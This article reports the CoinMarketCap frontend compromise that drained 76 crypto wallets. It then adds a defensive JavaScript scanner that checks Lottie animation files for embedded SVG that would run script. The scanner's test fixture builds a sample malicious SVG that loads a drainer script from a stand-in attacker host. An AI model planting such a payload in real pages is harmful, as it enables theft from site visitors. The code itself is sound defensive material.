76 wallets drained in CoinMarketCap frontend exploit
A security flaw on CoinMarketCap’s website let an attacker briefly inject a malicious pop-up into the homepage, costing victims thousands of dollars.
The MetaMask team warned users on Friday evening against connecting their wallets to CoinMarketCap’s website because the coin tracker’s frontend had been compromised to push a wallet drainer scam.
About an hour later, CoinMarketCap confirmed that visitors to its site should not connect their wallets when prompted.
Later that evening, CMC explained that a vulnerability in a “doodle image” on its homepage “contained a link that triggered malicious code through an API call, resulting in an unexpected pop-up for some users.”
Crypto cybersecurity firm Coinspect Security said it was able to recreate the JavaScript injection vulnerability behind the CMC wallet drainer attack, which was delivered by abusing Lottie animation JSON files.
Three cybersecurity experts from other firms separately confirmed to me over the weekend that Coinspect’s assessment of the incident is accurate.
Trey Blalock, founder of cybersecurity firm Verification Labs, told me he was able to retrieve copies of CoinMarketCap’s source code using the Internet Archive’s Wayback Machine to examine the incident.
“What is immediately noticeable is the heavy use of Scalable Vector Graphic (.SVG) images,” Blalock said of CMC’s site. “SVG is an excellent format for creating performant websites that look great across various display sizes, but recent security vulnerabilities have allowed attackers to embed HTML script tags inside SVG images that contain URLs to an attacker-controlled website, enabling them to execute a form of cross-site scripting.”
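What a frontend team can check for before publishing an animation, as an added example that is not code from CoinMarketCap, Coinspect or Verification Labs: a scanner that walks a Lottie animation JSON, decodes any embedded data: URIs, and flags SVG markup that would execute script if rendered inline. It covers both the Lottie-delivered injection Coinspect described and the script-tag-inside-SVG pattern Blalock describes. It assumes the standard Lottie layout in which embedded images live in assets[].p as data: URIs; the sample animation, the asset name and the attacker host (attacker.example) are constructed.

```javascript
// Added example (not CMC's, Coinspect's or Verification Labs' code): scan a Lottie
// animation JSON for embedded markup that would run script when rendered inline.
// Assumption: embedded images sit in assets[].p as data: URIs (standard Lottie layout).

// Patterns that turn a "picture" into executable content once it reaches the DOM.
const DANGEROUS = [
  { name: 'script-tag',    re: /<script[\s>]/i },
  { name: 'event-handler', re: /\son[a-z]+\s*=/i },          // onload=, onerror=, ...
  { name: 'javascript-url', re: /javascript\s*:/i },
  { name: 'foreign-object', re: /<foreignObject[\s>]/i },    // lets SVG embed arbitrary HTML
  { name: 'external-ref',  re: /\b(?:href|src)\s*=\s*["']?https?:\/\//i }, // loads from another host
];

// Decode a data: URI (base64 or percent-encoded) to text; null if the value is not one.
function decodeDataUri(value) {
  const m = /^data:([^,]*?)(;base64)?,(.*)$/is.exec(value);
  if (!m) return null;
  return m[2] ? Buffer.from(m[3], 'base64').toString('utf8') : decodeURIComponent(m[3]);
}

// Visit every string in the JSON document, yielding [jsonPath, value].
function* strings(node, path = '$') {
  if (typeof node === 'string') {
    yield [path, node];
  } else if (Array.isArray(node)) {
    for (let i = 0; i < node.length; i++) yield* strings(node[i], `${path}[${i}]`);
  } else if (node && typeof node === 'object') {
    for (const [k, v] of Object.entries(node)) yield* strings(v, `${path}.${k}`);
  }
}

// Return one finding per (string, rule) hit; embedded=true means the hit was inside a data: URI.
function scanLottie(animation) {
  const findings = [];
  for (const [path, raw] of strings(animation)) {
    const decoded = decodeDataUri(raw);
    const text = decoded ?? raw;
    for (const { name, re } of DANGEROUS) {
      if (re.test(text)) findings.push({ path, rule: name, embedded: decoded !== null });
    }
  }
  return findings;
}

// Reject-don't-sanitize: an animation with any finding should not ship.
function isSafeLottie(animation) {
  return scanLottie(animation).length === 0;
}

// Constructed sample: an "image" asset whose data: URI is really an SVG that pulls
// a script from an attacker-controlled host (attacker.example is hypothetical).
const payloadSvg =
  '<svg xmlns="http://www.w3.org/2000/svg">' +
  '<script src="https://attacker.example/drainer.js"></script></svg>';
const SAMPLE_MALICIOUS = {
  v: '5.7.4', fr: 30, ip: 0, op: 60, w: 200, h: 200,
  assets: [{ id: 'image_0', w: 200, h: 200, e: 1,
             p: 'data:image/svg+xml;base64,' + Buffer.from(payloadSvg).toString('base64') }],
  layers: [{ ty: 2, nm: 'doodle', refId: 'image_0' }],
};
// Constructed sample: a plain shape layer with no embedded assets.
const SAMPLE_BENIGN = {
  v: '5.7.4', fr: 30, ip: 0, op: 60, w: 200, h: 200,
  assets: [], layers: [{ ty: 4, nm: 'shape' }],
};

console.log(scanLottie(SAMPLE_MALICIOUS));
console.log('benign safe:', isSafeLottie(SAMPLE_BENIGN));
```

The scanner is a gate, not a fix: it rejects rather than tries to strip the offending markup, because regex-based sanitizing of SVG is easy to bypass. Pair it with a Content-Security-Policy whose script-src omits 'unsafe-inline' and allowlists only first-party hosts, and render any animation or SVG that originated outside the build pipeline through an <img> element, where browsers do not execute embedded script, rather than inlining it into the page.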